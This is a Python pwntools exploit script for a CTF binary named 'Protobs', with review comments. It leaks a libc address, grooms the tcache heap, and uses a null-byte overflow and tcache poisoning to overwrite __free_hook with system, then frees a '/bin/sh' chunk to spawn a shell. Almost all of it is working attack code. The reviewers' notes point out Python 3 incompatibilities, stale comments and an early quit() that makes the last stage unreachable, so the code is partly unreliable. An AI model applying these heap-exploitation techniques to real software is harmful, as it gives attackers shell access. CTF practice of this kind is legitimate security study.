#!/usr/bin/env python
# Exploit harness for the "Protobs" CTF binary, written against pwntools.
# NOTE(review): the string handling further down (str.ljust with '\x00',
# str + received data) is Python 2 style; under Python 3 pwntools these
# values are bytes and several lines would raise TypeError -- confirm the
# intended interpreter before running.
from pwn import *
# Most verbose pwntools log level: the tube traffic is echoed to the log.
context.log_level = 'DEBUG'
# Assigned here but never read anywhere else in this script.
debug=True
# Target is run locally; the process handle `p` is a module global that
# every helper below talks to.
p = process('./Protobs')
#libc = ELF('./libc.so.6')
# Only `__free_hook` is resolved from this ELF; the other libc offsets used
# later are hard-coded constants from a debugger session, so this file and
# those constants must come from the same libc build.
libc = ELF('./libc.so.6')
#gdb.attach(p,'heap-analysis')
def create_without_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description):
    """Select menu option 2 and answer every field prompt except the description.

    Each argument is stringified and sent as the reply to the matching
    prompt, in the order the program asks for them.  The prompt strings are
    the binary's own and must match byte-for-byte.  The size field is the
    last thing sent; no description line follows, so whatever the program
    does after that is left to the caller.  Operates on the global tube `p`.
    """
    menu_create = 2
    p.sendlineafter('~$ ', str(menu_create))
    fields = (
        (' [ Game ]: ', game),
        ('[ Contrast ]: ', contrast),
        ('[ Gamma ]: ', gamma),
        ('[ Resolution X-Axis ]: ', x_axis),
        ('[ Resolution Y-Axis ]: ', y_axis),
        ('[ Controller ]: ', controller),
        ('[ Size of Description ]: ', size_description),
    )
    for prompt, answer in fields:
        p.sendlineafter(prompt, str(answer))
def create_desc(game,contrast,gamma,x_axis,y_axis,controller,size_description,description):
    """Select menu option 2 and fill in a complete config, description included.

    Replies are sent in prompt order, each stringified.  Note that
    `size_description` and `description` are sent independently -- nothing
    here checks that the declared size and the actual payload length agree;
    the callers in this script deliberately rely on that.  Operates on the
    global tube `p`.
    """
    menu_create = 2
    p.sendlineafter('~$ ', str(menu_create))
    fields = (
        (' [ Game ]: ', game),
        ('[ Contrast ]: ', contrast),
        ('[ Gamma ]: ', gamma),
        ('[ Resolution X-Axis ]: ', x_axis),
        ('[ Resolution Y-Axis ]: ', y_axis),
        ('[ Controller ]: ', controller),
        ('[ Size of Description ]: ', size_description),
        ('[ Description ]: ', description),
    )
    for prompt, answer in fields:
        p.sendlineafter(prompt, str(answer))
def list_():
    """Select menu option 1 and log the listing the program prints.

    Consumes output up to and including the literal 'protobs', i.e. the
    start of the next shell-style prompt, so the tube is left positioned at
    that prompt.  The listing is only logged, not returned.
    """
    menu_list = 1
    p.sendlineafter('protobs@player2:~$ ', str(menu_list))
    listing = p.recvuntil('protobs')
    log.info("list of configuration : " + listing)
def read(idx,description):
    """Select menu option 3 and return the program's dump of config `idx`.

    `description` is accepted but never used; it is kept so the signature
    stays as callers expect it.  Output is read up to and including the
    next 'protobs' prompt marker and the final byte of that read is dropped
    before returning.  Not called anywhere in this script -- the main body
    drives option 3 by hand instead.
    """
    menu_read = 3
    p.sendlineafter('protobs@player2:~$ ', str(menu_read))
    p.sendlineafter('[ Config Index ]: ',str(idx))
    dump = p.recvuntil('protobs')
    trimmed = dump[:-1]
    return trimmed
def delete(idx):
    """Select menu option 4 and free config `idx` on the global tube `p`."""
    menu_delete = 4
    for prompt, answer in (('~$ ', menu_delete), ('[ Config Index ]: ', idx)):
        p.sendlineafter(prompt, str(answer))
# ---- Part 1: obtain a libc address from the program's own output ----
# NOTE(review): the trailing comments say 0x700, but `size` is 0x450 and the
# descriptions actually sent are 0x60 / 511 bytes -- the comments look stale
# relative to the values.
description= "A" * 0x60
size=0x450
create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
description= "B" * 511
create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
description= "C" * 511
create_desc("hello",0,0,0,0,0,size,description) ### 0x700 to not be in tcache range
delete(1) ## To Not free the head or tail of the heap but the MIDDLE
create_without_desc("hello",0,0,0,0,0,0)
list_()
# Option 3 for index 1, driven by hand rather than via read(), so that the
# raw bytes after the description prompt can be consumed below.
p.sendlineafter('@player2:~$ ', str(3))
p.sendlineafter('[ Config Index ]: ',str(1))
p.recvuntil('[ Description ]: ')
# Debugger notes the two offsets below were derived from.  They are tied to
# that one libc build; nothing here validates them against ./libc.so.6.
#gef p system
#Cannot access memory at address 0x7fb53ec9ffd0
#gef print __libc_start_main
#Cannot access memory at address 0x7fb53ec73a80
#gef p 0x7fb53ec9ffd0 - 0x7fb53ec73a80
libc_offset=0x001e4ca0
system_offset=0x0052fd0
# Resolved from the ELF rather than hard-coded.  Caveat for anyone reusing
# this: __free_hook no longer exists in glibc 2.34 and later, so the final
# stage of this script only applies to older libcs.
free_hook = libc.symbols['__free_hook']
# The next 6 bytes received are treated as a little-endian pointer and
# zero-padded to 8.  NOTE(review): str.ljust with a '\x00' fill is Python 2
# behaviour; with Python 3 bytes this line raises TypeError.
libc_leak = u64(p.recv(6).ljust(8, '\x00'))
libc_base = libc_leak - libc_offset
system=libc_base + system_offset
log.info("Leak: 0x{:x}".format(libc_leak))
log.info("Libc: 0x{:x}".format(libc_base))
log.info("system: 0x{:x}".format(system))
log.info('__free_hook: ' + hex(free_hook))
list_()
### SECOND PART
# ---- Part 2: heap grooming against the tcache, then the hook overwrite ----
# NOTE(review): the comment says "0x50 and 0x180" but both allocations below
# use 0x180; the 0x58/0x180 pair only appears further down.
# Add a 0x50 and 0x180 chunk
description = "A" * 0x180
size = 0x180
create_desc("hello",0,0,0,0,0,size,description)
description = "A" * 0x180
size = 0x180
create_desc("hello",0,0,0,0,0,size,description)
delete(3)
description = "A" * 0x100
size = 0x100
create_desc("hello",0,0,0,0,0,size,description)
delete(3) # delete config
# Add a 0x50 and 0x180 chunk
description = "A" * 0x58
size = 0x58
create_desc("hello",0,0,0,0,0,size,description)
description = "B"*0x180
size = 0x180
create_desc("hello",0,0,0,0,0,size,description)
# The script terminates here (SystemExit); everything below is unreachable
# as pasted and reads as the author's intended continuation.
quit()
# NOTE(review): the trailing "#0", "#1", "#3" comments on the delete() calls
# do not match the indices actually passed; they look like leftovers from an
# earlier numbering of the configs.
# Free them both
delete(3) #0 # Goes into 0x50 tcache bin
delete(4) #1 # Goes into 0x180 tcache bin
# Get back the 0x50 chunk, but also null byte overflow into the 0x180 chunk
# Also put in /bin/sh\x00 into it for later use
size=0x58
description='/bin/sh\x00' + 'A'*0x50
create_desc("hello",0,0,0,0,0,size,description) # chunk A
# The 0x180 chunk's size is now actually 0x100 (due to null byte overflow)
# This means we can free it again immediately
delete(5) #1 # Goes into 0xf0 tcache bin
# Get back the 0x100 chunk out of the 0x180 tcache bin
size=0x180
description='C'*0x180
create_desc("hello",0,0,0,0,0,size,description) # chunk B
# Since tcache_get will null out the key, we can free it immediately
delete(7) #3 # Goes into 0xf0 tcache bin
# Now: tcache[0x100] -> Chunk B <- Chunk B
# We do the usual tcache poisoning attack
# Get Chunk B from 0xf0 tcache bin and change its FD to __free_hook
size=0xf0
description=p64(free_hook) + 'D'*0xe8
create_desc("hello",0,0,0,0,0,size,description)
size=0xf0
description='E'*0xf0
# Allocates chunk B again
create_desc("hello",0,0,0,0,0,size,description)
size=0xf0
description=p64(system) + 'F'*0xe8
# Allocates chunk on __free_hook, change it to system
# (see the caveat in part 1: this hook does not exist on glibc >= 2.34)
create_desc("hello",0,0,0,0,0,size,description)
# Call free on the chunk with /bin/sh\x00 in it
# This will then call free('/bin/sh\x00') which calls system('/bin/sh\x00')
delete(4) #0
# Hand the tube over to the terminal.
p.interactive()